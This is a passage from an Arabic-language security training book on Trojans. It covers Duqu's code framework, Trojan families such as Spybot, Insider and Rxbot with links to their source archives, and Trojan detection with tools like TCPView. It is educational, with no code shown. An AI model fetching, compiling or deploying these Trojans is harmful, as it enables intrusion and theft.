‫ﺿﻣن ‪ %SystemDrive%\2385299062: 2302268273.exe‬وﯾﻧﻔذ ذﻟك‪ .‬ھذه اﻟﻣﻛوﻧﺎت اﻟرﺋﯾﺳﯾﺔ ﻠﻠ ‪loader‬ﺗﺿﻣن أن ﻣﻠﻔﺎت‬
‫‪ payload‬اﻹﺿﺎﻓﯾﺔ اﻟﻣﺧزﻧﺔ ﻓﻲ ‪ volume‬اﻟﻣﺧﻔﻲ ‪ NTFS‬ﺗم ﺗﺣﻣﯾﻠﮭﺎ وﺗﻧﻔﯾذھﺎ‪.‬‬

‫‪533‬‬
‫‪Trojan Analysis: Duqu‬‬

‫اﻟﻣﺻدر‪http://www.securelist.com :‬‬
‫اﻟﻣﺻدر‪http://www.securelist.com/en/blog/208193178/Duqu_FAQ :‬‬
‫‪ Duqu‬ھو ﺣﺻﺎن طروادة ﻣﺗطور واﻟﺗﻲ ﯾﺑدو اﻧﮭﺎ ﻗد ﻛﺗﺑت ﻣن ﻗﺑل ﻧﻔس اﻻﺷﺧﺎص اﻟذﯾن أﻧﺷﺋوا ‪ Stuxnet worm‬ﺳﯾﺋﺔ اﻟﺳﻣﻌﺔ‪.‬‬
‫واﻟﻐرض اﻟرﺋﯾﺳﻲ ﻣﻧﮭﺎ ھو اﻟﻌﻣل ﻛﺄﻧﮫ ‪ Backdoor‬ﻓﻲ اﻟﻧظﺎم ﻟﺗﺳﮭﯾل ﺳرﻗﺔ اﻟﻣﻌﻠوﻣﺎت اﻟﺧﺎﺻﺔ‪.‬‬
‫اﻟﻣﻘطﻊ اﻟﻛودى ﻓﻲ ‪ Payload DLL‬ھو ﻋﺎﻣﺔ ﻋﺑﺎره ﻋن ‪ binary‬واﻟﺗﻲ ﺗم إﻧﺷﺎﺋﮭﺎ ﻣن ﻋدة ﻗطﻊ ﻣن اﻷﻛواد‪ .‬وھو ﯾﺗﺄﻟف ﻣن "‪"slices‬‬
‫ﻣن اﻷﻛواد اﻟﺗﻲ ﻗد ﺗم ﺗﺟﻣﯾﻌﮭﺎ ﻓﻲ اﻟﺑداﯾﺔ ﻓﻲ ﻣﻠف ﻛﺎﺋن )‪ (object file‬ﻣﻧﻔﺻل ﻗﺑل رﺑطﮭﺎ ﻓﻲ ﻣﻠف ‪ DLL‬واﺣد‪ .‬ﻣﻌظﻣﮭم ﯾﻣﻛن اﻟﻌﺛور‬
‫ﻋﻠﯾﮭﺎ ﻓﻲ أي ﺑرﻧﺎﻣﺞ ‪ ،C++‬ﻣﺛل ‪،run-time library functions ،Standard Template Library (STL) functions‬‬
‫و‪ ،user-written code‬ﻣﺎﻋدا اﻟﺷرﯾﺢ اﻷﻛﺑر ﻣن ‪ slices‬واﻟﺗﻲ ﺗﺣﺗوي ﻋﻠﻰ ﻣﻌظم اﻷﻛواد اﻟﺗﻔﺎﻋﻠﯾﺔ ﻣن ‪.C&C‬‬
‫‪Duqu Framework‬‬
‫ھذه ‪ slice‬ﻣﺧﺗﻠﻔﺔ ﻋن اﻵﺧرﯾن‪ ،‬ﻷﻧﮫ ﻟم ﯾﺗم ﺗﺟﻣﯾﻌﮭﺎ ﺑواﺳطﺔ ‪ .C++‬ﻻ ﺗﺣﺗوي ﻋﻠﻰ إﺷﺎرات إﻟﻰ أي ﻣن اﻟوظﺎﺋف )‪ (Function‬ﺳواء‬
‫اﻟﻣﻌﯾﺎرﯾﺔ أو‪ ، user-written C++‬وﻟﻛن ھﻲ ﺑﺎﻟﺗﺄﻛﯾد ‪ .object-oriented‬وھذا ﯾطﻠﻖ ﻋﻠﯾﮫ ‪.Duqu Framework‬‬
‫اﻟﺧﺻﺎﺋص اﻟﻛودﯾﮫ ﻠﻠ ‪.Duqu Framework‬‬
‫اﻷﻛواد اﻟﺗﻲ اﺳﺗﺧدﻣت ﻓﻲ ﺗﻧﻔذ ‪ Duqu Framework‬ﻟدﯾﮭﺎ اﻟﻌدﯾد ﻣن اﻟﺧﺻﺎﺋص اﻟﻣﻣﯾزة‪:‬‬
‫‪ -‬ﯾﺗم ﺗﻐﻠﯾف ﻛل ﺷﻲء ﻓﻲ ‪object‬‬
‫‪ -‬ﯾﺗم وﺿﻊ ﺟدول اﻟوظﺎﺋف )‪ (Function table‬ﻣﺑﺎﺷرة ﻓﻲ ‪ class instance‬وﯾﻣﻛن ﺗﻌدﯾﻠﮫ ﺑﻌد اﻟﺑﻧﺎء‪.‬‬
‫‪ -‬ﻟﯾس ھﻧﺎك أي ﺗﻣﯾﯾز ﺑﯾن ‪ ( hashes،linked lists) utility class‬و‪.user written code‬‬
‫‪ -‬ﻛﺎﺋن اﻟﺗواﺻل )‪ (Object communication‬ﯾﺳﺗﺧدم ‪ deferred execution queues ،method call‬و ‪event-driven‬‬
‫‪.caHbacks‬‬
‫‪ -‬ﻻ ﺗوﺟد إﺷﺎرات إﻟﻰ ‪run-time library functions‬؛ ﯾﺗم اﺳﺗﺧدام ‪ API Windows‬اﻷﺻﻠﻲ ﺑدﯾﻼ‪.‬‬

‫‪534‬‬
‫‪Event-Driven Framework‬‬
‫ﺗﺻﻣﯾم وﺗﻧﻔﯾذ اﻟﻛﺎﺋﻧﺎت ﻓﻲ ‪ Duqu Framework‬ھﻲ ﺑﺎﻟﺗﺄﻛﯾد ﻟﯾﺳت ﻣﺑرﻣﺟﮫ ﻣن ﻗﺑل ‪C++‬واﻟﺗﻲ ﺗﺳﺗﺧدم ﻟﺑرﻣﺟﺔ ﺑﻘﯾﺔ اﻟﺗروﺟﺎن‪ .‬ھﻧﺎك‬
‫ﻣﯾزات ﻛﺛﯾره ﻣﺛﯾره ﻟﻼھﺗﻣﺎم ﻟﻺطﺎر)‪ (Framework‬اﻟذي ﯾﺳﺗﺧدم ﻋﻠﻰ ﻧطﺎق واﺳﻊ ﻓﻲ ﺟﻣﯾﻊ أﻧﺣﺎء اﻟﻛود ﻛﻠﮫ‪ :‬وھو ‪.event driven‬‬
‫ھﻧﺎك ﻛﺎﺋﻧﺎت ﺧﺎﺻﺔ )‪ (special object‬واﻟﺗﻲ ﺗﻘوم ﺑﺗﻧﻔﯾذ اﻟﻧﻣوذج ‪:event driven‬‬
‫‪ ، Event objects -‬ﺗﺳﺗﻧد إﻟﻰ ﻣﻌﺎﻟﺟﮫ ﺑواﺳطﺔ ‪.API Windows‬‬
‫‪ Thread context objects -‬واﻟﺗﻲ ﺗﻌﻘد ﻗواﺋم اﻷﺣداث وطواﺑﯾر اﻟﺗﻧﻔﯾذﯾﺎت اﻟﻣؤﺟﻠﺔ‪.‬‬
‫‪ Callback objects -‬اﻟﺗﻲ ﯾﺗم رﺑطﮭﺎ ﺑﺎﻷﺣداث)‪(event‬‬
‫‪ ، Event monitors -‬اﻟﺗﻲ ﺗم أﻧﺷﺄﺗﮭﺎ ﻣن ﻛل ‪ thread context‬ﻟرﺻد اﻷﺣداث)‪ (event‬وﺗﻧﻔﯾذ ‪.Callback objects‬‬
‫‪ Thread context storage -‬ﯾدﯾر ﻗﺎﺋﻣﺔ ‪ thread‬اﻟﻧﺷطﺔ وﯾوﻓر اﻟوﺻول إﻟﻰ ‪.per-thread‬‬
‫ﻧﻣوذج ‪ event driven‬ھذا ﯾﺷﺑﮫ ‪ ،Object C‬وﻟﻛن اﻷﻛواد ﻟﯾس ﻟدﯾﮭﺎ أي إﺷﺎرات ﻣﺑﺎﺷرة ﻟﻠﻐﺔ‪ ،‬ﻛﻣﺎ أﻧﮫ ﻻ ﺗﺑدو وﻛﺄﻧﮭﺎ ﻣﺗرﺟﻣﺔ‬
‫)‪ (Compiled‬ﻣﻊ ‪.C compilers‬‬
‫ﻣﻠﺣوظﮫ‪ :‬ﯾﻣﻛن ﺗﺣﻣﯾل اﻟﻌدﯾد ﻣن ﻣﻠﻔﺎت اﻟﺗروﺟﺎن اﻟﺗﻲ ﺗﺣدﺛﻧﺎ ﻋﻧﮭﺎ ﻣن ﺧﻼل زﯾﺎرة اﻟراﺑط اﻟﺗﺎﻟﻲ‪:‬‬
‫‪http://ihackers.co/downloads/tools/‬‬

‫‪535‬‬
‫‪Trojan Types in Kali Linux‬‬
‫ﻟﻛن ﻣﻊ ﻛﺎﻟﻲ ﻧﺟد ان اﻟوﺿﻊ ﯾﺧﺗﻠف ﺣﯾث ھو اﻻﺧر ﻗﺎم ﺑﺗﻘﺳﯾم اﻟﺗروﺟﺎن اﻟﻰ ﺛﻼث أﻧواع رﺋﯾﺳﯾﮫ ﻓﻘط دون اﻟﻧظر اﻟﻰ اﻟوظﯾﻔﺔ اﻟﺗﻲ ﯾﻘوم‬
‫ﺑﮭﺎ ﻛﺎﻻﺗﻰ‪:‬‬
‫‪Binary Trojan Horses‬‬
‫أﺣﺻﻧﺔ اﻟطروادة ھذه ﺗﺄﺗﻲ ﻓﻲ ﺷﻛل ‪ (.exe) binary‬وﻋﺎدة ﻣﺎ ﺗﺷﻣل واﺟﮭﺔ رﺳوﻣﯾﺔ ﻟﺗﻛوﯾن طروادة‪ .‬ﯾﺗم ﺑﻧﺎؤھﺎ ﻟﻌﻣل ﺿﺎر وﻏﺎﻟﺑﺎ ﻣﺎ‬
‫ﺗﺷﻣل اﻟﻣﯾزات ﻣﺛل ‪ ،eject CD-ROM ،swap mount buttons‬ﺗﺟﺳس ﻋﻠﻰ ﻛﺎﻣﯾرا وﯾب‪ ،‬وھﻛذا‪.‬‬
‫ﺗﻌﺗﺑر أﺣﺻﻧﺔ طروادة ھذه ﻏﯾر آﻣﻧﺔ اﻻﺳﺗﺧدام ﻟﻠﻐﺎﯾﺔ ﻷﻧﮭﺎ ﻏﺎﻟﺑﺎ ﻣﺎ ﺗﺣﺗوي ﻋﻠﻰ ‪ .backdoor‬ﻋدة ﺳﻧوات اﻟﻰ اﻟوراء ﻛﺎن ھﻧﺎك ﺣﺻﺎن‬
‫طروادة أﻛﺛر ﺷﻌﺑﯾﺔ ﯾﺳﻣﻰ ‪ ،Optix Pro‬واﻟﺗﻲ ﻛﺛﯾرا ﻣﺎ ﺗم ﺗﺣدﯾﺛﮫ واﺳﺗﺧداﻣﮫ ﻋﻠﻰ ﻧطﺎق واﺳﻊ ﻣن ﻗﺑل ﻣﺟﺗﻣﻊ اﻟﻘراﺻﻧﺔ‪ .‬ﺣﯾث ﻛﺷﻔت‬
‫اﻟﺗﺣﻠﯾل اﻟﻌﻣﯾﻖ ﻟﻠﺣﺻﺎن طروادة ھذه ﻛﻠﻣﺔ اﻟﺳر رﺋﯾﺳﯾﺔ إﻟﻰ ﺣﺻﺎن طروادة اﻟذي ﺗم وﺿﻌﮭﺎ ﺑﻌﻧﺎﯾﺔ ﻣن ﻗﺑل واﺿﻌﻲ ‪ .Optix Pro‬ﻋدة أﻣﺛﻠﺔ‬
‫ﻣن أﺣﺻﻧﺔ طروادة ‪ binary‬ﯾﻣﻛن اﻟﻌﺛور ﻋﻠﯾﮭﺎ ھﻧﺎ‪:‬‬
‫‪http://www.offensivesecurity.com/pwbonline/binary-trojans.tar.gz‬‬
‫‪Open Source Trojan Horses‬‬
‫ﯾﻔﺿل اﺳﺗﺧدام اﺣﺻﻧﺔ طروادة ﻣﻔﺗوﺣﺔ اﻟﻣﺻدر أﻛﺛر ﻣن أﺣﺻﻧﺔ طروادة ‪ binary‬وذﻟك ﻻن اﻟﻛود اﻟﻣﺻدري اﻟﺧﺎﺻﺔ ﺑﮭم ﯾﻣﻛن‬
‫اﺳﺗﻌراﺿﮫ ﻓﺗﻼﺣظ إذا ﻛﺎن ھﻧﺎك ‪ backdoor‬ام ﻻ‪ .‬ﻛﺎﻧت ھﻧﺎك اﻟﻌدﯾد ﻣن اﻟﺣﺎﻻت اﻟﺗﻲ وﺟد ﻓﻲ أﺻﻧﺔ طروادة ﻣﻔﺗوﺣﺔ اﻟﻣﺻدر‬
‫‪ ،backdoor‬ﻟذﻟك ﻻ ﯾﻔﺿل اﻟﺛﻘﺔ اﻟﻌﻣﯾﺎء ﻣﻊ أﺣﺻﻧﺔ طروادة ﻣﻔﺗوﺣﺔ اﻟﻣﺻدر‪ .‬ﻓﺎﺋدة إﺿﺎﻓﯾﺔ ﻣن أﺣﺻﻧﺔ طروادة اﻟﻣﺻدر اﻟﻣﻔﺗوح ھو أﻧﮭﺎ‬
‫ﯾﻣﻛن ﺗﻌدﯾﻠﮭﺎ وﺗﺣﺳﯾﻧﮭﺎ ﻟﺗﻧﺎﺳب اﺣﺗﯾﺎﺟﺎﺗك‪.‬‬
‫‪Spybot -1‬‬
‫‪ Spybot‬ھو ﺣﺻﺎن طروادة ﯾﺳﺗﻧد ﻋﻠﻰ‪ . IRC‬وھو ﯾﻌﻣل ﻛﺄﻧﮫ ﻋﻣﯾل ‪ IRC‬اﻟذي ﯾرﺗﺑط ﻣﻊ ﻣﻠﻘم ‪) IRC‬اﺳﺗﺿﺎﻓت إﻣﺎ ﻋن طرﯾﻖ اﻟﻣﮭﺎﺟم‬
‫أو ﻣن ﻗﺑل طرف ﺛﺎﻟث(‪ .‬ھذا اﻟﺗروﺟﺎن ﯾﺗطﻠب ﻛﻠﻣﺔ ﻣرور ﻟﻠﺗﺷﻐﯾل وﻗﺎدر ﻋﻠﻰ اﻻﺳﺗﻣﺎع إﻟﻰ دردﺷﺔ ‪ IRC‬ﻓﺿﻼ ﻋن ﺗﻧﻔﯾذ اﻷواﻣر ﻋﻠﻰ‬
‫ﺟﮭﺎز اﻟﺿﺣﯾﺔ‪.‬‬
‫ﺳوف ﺗﺣﺗﺎج إﻟﻰ ‪ lccwin32‬ﻟﺗرﺟﻣﺔ )‪ Spybot .Spybot (compile‬و‪ lccwin32‬ﯾﻣﻛن اﻟﻌﺛور ﻋﻠﯾﮭﺎ ھﻧﺎ‪:‬‬
‫‪http://www.offensive-security.com/pwbonline/spybot.tar.gz‬‬
‫‪Insider -2‬‬
‫‪ Insider‬ھو ﺣﺻﺎن طروادة ﯾﺳﺗﻧد ﻋﻠﻰ ‪ HTTP‬اﻟﺗﻲ ﺗم إﻧﺷﺎؤھﺎ ﻟﺗﺟﺎوز ﺟدران اﻟﺣﻣﺎﯾﺔ ﻟﻠﺷرﻛﺎت وﻧظم ﺗﻔﺗﯾش اﻟﻣﺣﺗوى‪Insider .‬‬
‫ﯾﺣﺎول اﻟﻘﯾﺎم ﺑﺈﻧﺷﺎء طﻠب ‪GET HTTP‬إﻟﻰ ﺧﺎدم اﻟوﯾب اﻟﻣﻌرف ﻣﺳﺑﻘﺎ واﻟذى ﯾﺣﺗوي ﻋﻠﻰ ﻗﺎﺋﻣﺔ ﻣن اﻷواﻣر ﻟﺗﻧﻔﯾذھﺎ‪ .‬اﻟﺗروﺟﺎن ﯾﻘوم‬
‫ﺑﺎﻟﺑﺣث ﻋن ﻋﻧﺎوﯾن ﻣﻠﻘم اﻟﺑروﻛﺳﻲ ﻓﻲ ‪ ،registry‬ﻓﺈذا وﺟدت‪ ،‬ﯾﺳﺗﺧدم اﻟﺑروﻛﺳﻲ ﻟﻼﺗﺻﺎل ﻋﻠﻰ ﺷﺑﻛﺔ اﻹﻧﺗرﻧت‪ .‬ﻓﺈذا ﻛﺎن اﻟﺑروﻛﺳﻲ ﯾطﻠب‬
‫إذن دﺧول‪ ،‬ﻓﺎن اﻟﺗروﺟﺎن ﺳوف ﯾظﮭر ﻣرﺑﻊ ﺣوار ﻣﺻﺎدﻗﺔ اﻟﺑروﻛﺳﻲ اﻟﻰ اﻟﻣﺳﺗﺧدم ﻟﯾﻣﻠﺋﮭﺎ‪.‬‬
‫ﯾﻣﻛن اﻟﻌﺛور ﻋﻠﯾﮭﺎ ھﻧﺎ‪:‬‬
‫‪http://www.offensive-security.com/pwbonline/insider.tar.gz‬‬
‫‪World Domination Trojan Horses‬‬
‫‪ World domination Trojan horses‬ﯾﻣﻛن اﻋﺗﺑﺎره ‪ hybrid worm‬ﻷن وظﯾﻔﺗﮭﺎ اﻟرﺋﯾﺳﯾﺔ ھﻲ اﻻﻧﺗﺷﺎر وإﺻﺎﺑﺔ أﺟﮭزة ﻛﻣﺑﯾوﺗر‬
‫إﺿﺎﻓﯾﺔ‪ ،‬وﻋﺎدة ﺑﺎﺳﺗﺧدام ‪ exploits‬ﻣﺷﺗرﻛﺔ‪ .‬أﺣﺻﻧﺔ اﻟطروادة ھذه ﻋﺎدة ﺗﻘوم ﺑﻔﺣص اﻹﻧﺗرﻧت )أو ﻣﺟﻣوﻋﺔ ﻣﺣددة ﻣن ﻧطﺎق ‪ (IP‬ﻷﺟﮭزة‬
‫اﻟﻛﻣﺑﯾوﺗر ذات ﻧﻘﺎط اﻟﺿﻌف‪ .‬ﻋﻧدﻣﺎ ﯾﺗم اﻟﻌﺛور ﻋﻠﻰ ﻣﺛل ھذا اﻟﻛﻣﺑﯾوﺗر واﺳﺗﻐﻼﻟﮭﺎ‪ ،‬وذﻟك ﺑﺗﺣﻣﯾل ﻧﺳﺧﺔ طروادة ﻣن ﻧﻔﺳﮭﺎ إﻟﻰ ﺟﮭﺎز‬
‫اﻟﺿﺣﯾﺔ‪ ،‬ﺛم ﯾﺑدا اﻟﻌﻣل‪ ،‬وﯾﺑدأ اﻟﻔﺣص ﻣرة أﺧرى‪ .‬ﻋﻧدﻣﺎ ﯾﺗم اﻟﺗﺳﻠﯾﺢ ﺒ ‪ exploit‬ﺟدﯾدة‪ ،‬ﯾﻣﻛن ﻷﺣﺻﻧﺔ اﻟطروادة ھذه اﻧت ﺗﻧﺗﺷر ﺑﺳرﻋﮫ‪ .‬ﻟﻘد‬
‫رأﯾت اﻧﺗﺷﺎر أﺣد اﺣﺻﻧﺔ طروادة ھذه ﺣﯾث ﻗﺎم ﺗﻠﻘﺎﺋﯾﺎ ﺑﺎﺧﺗراق ‪ 4000‬ﺿﺣﯾﺔ ﻓﻲ ‪ 24‬ﺳﺎﻋﺔ‪ .‬أﺣﺻﻧﺔ اﻟطروادة ھذه ﻋﺎدة ﺗﻧﺿم ﻣﻊ ﺑﻌض‬
‫ﻟﺗﺷﻛﯾل ‪ botnet‬واﻟﺗﻲ ﯾﻣﻛن اﺳﺗﺧداﻣﮭﺎ ﻟﺷن ھﺟﻣﺎت ‪ ،DDOS‬وﻧﺷر اﻟﺑرﯾد اﻟﻣزﻋﺞ‪ ،‬وﻣﯾزات أﺧرى ﻣﺿره‪.‬‬
‫‪Rxbot -1‬‬
‫‪ Rxbot‬ھو ﺣﺻﺎن طروادة ﻣﺳﺗﻧد اﻟﻰ ‪ IRC‬ﻣﻊ ﻗدرات اﻻﻧﺗﺷﺎر‪ .‬ﺣﺻﺎن طروادة ھذه ﻟدﯾﮫ ﺑﻌض اﻷﻛواد ‪ anti-debugging‬اﻟﻣﺛﯾرة ﺟدا‬
‫ﻟﻼھﺗﻣﺎم‪ ،‬ﺑﻣﺎ ﻓﻲ ذﻟك اﻟﺗﺣﻘﻖ ﻣن ﺑرﻧﺎﻣﺞ ‪ .VMWare‬ﻛن ﺣذرا ﻋﻧد اﺳﺗﺧداﻣﮫ‪.‬‬
‫‪http://www.offensive-security.com/pwbonline/rxbot.tar.gz‬‬

‫‪536‬‬
‫)‪ TROJAN DETECTION (6.5‬اﻟﻜﺸﻒ ﻋﻦ اﻟﺘﺮوﺟﺎن‬
‫ﺣﺗﻰ اﻵن‪ ،‬ﻟﻘد ﻧﺎﻗﺷﻧﺎ ﻛﯾف ﯾﺻﯾب اﻟﺗروﺟﺎن اﻟﻧظﺎم وأﻧواع أﺣﺻﻧﺔ طروادة اﻟﻣﺗﺎﺣﺔ‪ .‬اﻵن ﺳوف ﻧﻧﺎﻗش ﻛﯾﻔﯾﺔ إﺟراء اﻟﻛﺷف ﻋن طروادة‪.‬‬
‫ﻛﺷف طروادة ﯾﺳﺎﻋد ﻓﻲ اﻟﻛﺷف ﻋن وﺟود ﺣﺻﺎن طروادة ﻋﻠﻰ اﻟﻧظﺎم اﻟﻣﺻﺎب وﺑﺎﻟﺗﺎﻟﻲ ﯾﺳﺎﻋدك ﻓﻲ ﺣﻣﺎﯾﺔ اﻟﻧظﺎم وﻣوارده ﻣن اﻟﻣزﯾد ﻣن‬
‫اﻟﺧﺳﺎﺋر‪ .‬ﯾرﻛز ھذا اﻟﻘﺳم ﻋﻠﻰ ﻛﺷف طروادة ﺑﺎﺳﺗﺧدام ﺗﻘﻧﯾﺎت او أﺳﺎﻟﯾب ﻣﺧﺗﻠﻔﺔ‪.‬‬
‫ﻛﯾﻔﯾﺔ اﻟﻛﺷف ﻋن ﺣﺻﺎن طروادة )‪(How To Detect Trojans‬؟‬

‫اﻟﺗروﺟﺎن ھﻲ ﺑراﻣﺞ ﺧﺑﯾﺛﺔ واﻟﺗﻲ ﯾﺗم ﺟﻌﻠﮭﺎ ﻛﺄﻧﮭﺎ ﻣﻠف ﻣﻔﯾد أو ﻣﺷروع ﻟﻛن اﻟﻐرض اﻟﻔﻌﻠﻲ ھو اﻟﺳﯾطرة اﻟﻛﺎﻣﻠﺔ ﻋﻠﻰ ﺟﮭﺎز اﻟﻛﻣﺑﯾوﺗر اﻟﺧﺎص‬
‫ﺑك‪ ،‬وﺑﺎﻟﺗﺎﻟﻲ اﻟوﺻول إﻟﻰ اﻟﻣﻠﻔﺎت اﻟﺧﺎﺻﺔ ﺑك واﻟﻣﻌﻠوﻣﺎت اﻟﺳرﯾﺔ‪ .‬ﻣن أﺟل ﺗﺟﻧب ﻣﺛل ھذا اﻟدﺧول اﻟﻐﯾر ﻣﺻرح ﺑﮫ‪ ،‬وﺣﻣﺎﯾﺔ اﻟﻣﻠﻔﺎت‬
‫واﻟﻣﻌﻠوﻣﺎت اﻟﺷﺧﺻﯾﺔ‪ ،‬ﻓﻼﺑد ﻣن اﺳﺗﺧدام ﻣﻧﺗﺞ ﻟﻣﻛﺎﻓﺣﺔ اﻟﻔﯾروﺳﺎت‪ ،‬اﻟذي ﯾﻣﺳﺢ ﺗﻠﻘﺎﺋﯾﺎ ﺑﺎﻟﻛﺷف ﻋن وﺟود اﻟﺗروﺟﺎن ﻋﻠﻰ اﻟﻧظﺎم اﻟﺧﺎص ﺑك‬
‫أو ﯾﻣﻛﻧك أﯾﺿﺎ اﻟﻛﺷف ﻋن ﺗﺛﺑﯾت اﻟﺗروﺟﺎن ﻋﻠﻰ اﻟﻧظﺎم اﻟﺧﺎص ﺑك ﯾدوﯾﺎ‪ .‬وﻓﯾﻣﺎ ﯾﻠﻲ اﻟﺧطوات ﻟﻠﻛﺷف ﻋن ﺣﺻﺎن طروادة‪:‬‬
‫اﻟﺑﺣث ﻋن اﻟﻣﻧﺎﻓذ اﻟﻣﻔﺗوﺣﺔ اﻟﻣﺷﺑوھﺔ‪.‬‬ ‫‪-‬‬

‫اﻟﺑﺣث اﻟﻌﻣﻠﯾﺎت اﻟﺗﻲ ﺗﻌﻣل اﻟﻣﺷﺑوھﺔ‪.‬‬ ‫‪-‬‬
‫اﻟﺑﺣث ﻋن إدﺧﺎﻻت ‪ registry‬اﻟﻣﺷﺑوھﺔ‪.‬‬ ‫‪-‬‬
‫اﻟﺑﺣث ﻋن ﺑراﻣﺞ ﺗﺷﻐﯾل اﻷﺟﮭزة )‪ (device driver‬اﻟﻣﺷﺑوھﺔ اﻟﻣﺛﺑﺗﺔ ﻋﻠﻰ ﺟﮭﺎز اﻟﻛﻣﺑﯾوﺗر‬ ‫‪-‬‬
‫اﻟﺑﺣث ﻋن ‪ WINDOWS SERVICE‬اﻟﻣﺷﺑوھﺔ‪.‬‬ ‫‪-‬‬
‫ﻓﺣص ﺑراﻣﺞ ﺑدء اﻟﺗﺷﻐﯾل اﻟﻣﺷﺑوھﺔ‪.‬‬ ‫‪-‬‬
‫اﻟﺑﺣث ﻋن اﻟﻣﻠﻔﺎت واﻟﻣﺟﻠدات اﻟﻣﺷﺑوھﺔ‪.‬‬ ‫‪-‬‬
‫ﻓﺣص أﻧﺷطﺔ اﻟﺷﺑﻛﺔ اﻟﻣﺷﺑوھﺔ‪.‬‬ ‫‪-‬‬
‫ﻓﺣص اﻟﺗﻌدﯾﻼت اﻟﻣﺷﺑوھﺔ ﻟﻣﻠﻔﺎت ﻧظﺎم اﻟﺗﺷﻐﯾل‪.‬‬ ‫‪-‬‬
‫ﺗﺷﻐﯾل ‪ Trojan Scanner‬ﻟﻠﻛﺷف ﻋن اﻟﺗروﺟﺎن‪.‬‬ ‫‪-‬‬
‫اﻟﺑﺣث ﻋن اﻟﻣﻧﺎﻓذ اﻟﻣﺷﺑوھﺔ )‪(Scanning For Suspicious Ports‬‬
‫أﺣﺻﻧﺔ طروادة ﺗﻘوم ﺑﻔﺗﺢ اﻟﻣﻧﺎﻓذ اﻟﻐﯾر ﻣﺳﺗﺧدﻣﺔ ﻋﻠﻰ ﺟﮭﺎز اﻟﺿﺣﯾﺔ ﻟﻼﺗﺻﺎل ﻣرة أﺧرى إﻟﻰ ﻣﻌﺎﻟﺟﺎت اﻟﺗروﺟﺎن‪ .‬ﯾﻣﻛن ﺗﺣدﯾد أﺣﺻﻧﺔ‬
‫طروادة ھذه ﻋن طرﯾﻖ ﻓﺣص اﻟﻣﻧﺎﻓذ اﻟﻣﺷﺑوھﺔ‪ .‬ﻓﺣص اﻟﻣﻧﺎﻓذ اﻟﻣﺷﺑوھﺔ واﻟﺑﺣث ﻋن اﺗﺻﺎل ﺗم ﺗﺄﺳﯾﺳﮫ إﻟﻰ ﻋﻧﺎوﯾن ‪ IP‬ﻏﯾر ﻣﻌروﻓﮫ أو‬
‫ﻣﺷﺑوھﺔ‪.‬‬

‫‪537‬‬
‫‪Port Monitoring Tools: TCPView and Currports‬‬

‫‪TCPView‬‬
‫اﻟﻣﺻدر‪http://technet.microsoft.com :‬‬
‫‪ TCPView‬ھو ﺑرﻧﺎﻣﺞ وﯾﻧدوز واﻟﺗﻲ ﺳوف ﯾظﮭر ﻟك ﻗواﺋم ﺗﻔﺻﯾﻠﯾﺔ ﻟﺟﻣﯾﻊ اﺗﺻﺎﻻت ‪ TCP‬و ‪ UDP‬ﻋﻠﻰ اﻟﻧظﺎم اﻟﺧﺎص ﺑك‪ ،‬ﺑﻣﺎ ﻓﻲ ذﻟك‬
‫اﻟﻌﻧﺎوﯾن اﻟﻣﺣﻠﯾﺔ واﻟﺑﻌﯾدة وﺣﺎﻟﺔ اﺗﺻﺎﻻت ‪ .TCP‬ﻋﻠﻰ ‪ ،Windows Server 2008‬وﯾﻧدوز ﻓﯾﺳﺗﺎ‪ ،‬وإﻛس ﺑﻲ‪ TCPView ،‬ﯾﻌطﻰ أﯾﺿﺎ‬
‫ﺗﻘﺎرﯾر ﻋن اﺳم اﻟﻌﻣﻠﯾﺔ اﻟﻣرﺗﺑطﺔ ﺑﮭﺎ‪ TCPView .‬ﯾوﻓر ﻣﺟﻣوﻋﺔ ﻓرﻋﯾﺔ ﻣن اﻟﻣﻌﻠوﻣﺎت وأﻛﺛر إﻓﺻﺎﺣﺎ ﻣن ﺑرﻧﺎﻣﺞ ‪ netstat‬اﻟذي ﯾﺄﺗﻲ ﻣﻊ‬
‫وﯾﻧدوز‪.‬‬
‫ﻋﻧد ﺑدء ﺗﺷﻐﯾل ‪ TCPView‬ﺳﯾﻘوم ﺑﺗﻌداد ﻛﺎﻓﺔ ‪ TCP‬و ‪UDP‬اﻟﻧﺷطﺔ‪ ،‬ﺗرﺟﻣﺔ ﺟﻣﯾﻊ ﻋﻧﺎوﯾن ‪ IP‬إﻟﻰ إﺻدارات اﺳم اﻟدوﻣﯾن اﻟﺧﺎص ﺑﮭﺎ‪.‬‬
‫ﻋﻠﻰ أﻧظﻣﺔ وﯾﻧدوز‪TCPView ، XP‬ﯾظﮭر اﺳم اﻟﻌﻣﻠﯾﺔ ﻣﻊ ﻛﺎﻓﺔ اﻻﺗﺻﺎﻻت اﻟﺗﻲ ﺗﻣﻠﻛﮭﺎ‪ .‬اﻓﺗراﺿﯾﺎ‪ TCPView ،‬ﺗﺣدث ﻗواﺋﻣﮭﺎ ﻛل ﺛﺎﻧﯾﮫ‪.‬‬
‫ﺣﯾث ﻗواﺋم اﻻﺗﺻﺎل اﻟﻣﺣدﺛﺔ ﻣن واﺣده اﻟﻰ أﺧرى ﺗﻛون ذات اﻟﻠون اﻷﺻﻔر؛ اﻣﺎ اﻟﺗﻲ ﺗم ﻣﺳﺣﮭﺎ او اﻧﮭﺎﺋﮭﺎ ﻓﺗﻛون ﺑﺎﻟﻠون اﻷﺣﻣر‪،‬‬
‫واﻻﺗﺻﺎﻻت اﻟﺟدﯾدة ﺗﻛون ﺑﺎﻟﻠون اﻷﺧﺿر‪ .‬اﻟﻣﺳﺗﺧدم ﯾﻣﻛﻧﮫ إﻏﻼق اﺗﺻﺎﻻت ‪ TCP/IP‬اﻟﺛﺎﺑﺗﺔ )ﺗﻠك ‪ labeled‬ﺒ ‪(state ESTABLISHED‬‬
‫ﻋن طرﯾﻖ اﺧﺗﯾﺎر ‪ ،Close Connections | File‬أو ﻋن طرﯾﻖ اﻟﻧﻘر ﺑزر اﻟﻣﺎوس اﻷﯾﻣن ﻋﻠﻰ ‪ connection‬واﺧﺗﯾﺎر ‪close‬‬
‫‪ connection‬ﻣن ﻗﺎﺋﻣﺔ اﻟﺳﯾﺎق اﻟﻧﺎﺗﺟﺔ‪ .‬ﯾﻣﻛﻧك ﺣﻔظ إﺧراج ‪ TCPView‬إﻟﻰ ﻣﻠف ﺑﺎﺳﺗﺧدام ﺣﻔظ ﻋﻧﺻر اﻟﻘﺎﺋﻣﺔ‪.‬‬
‫‪CurrPorts Tool‬‬
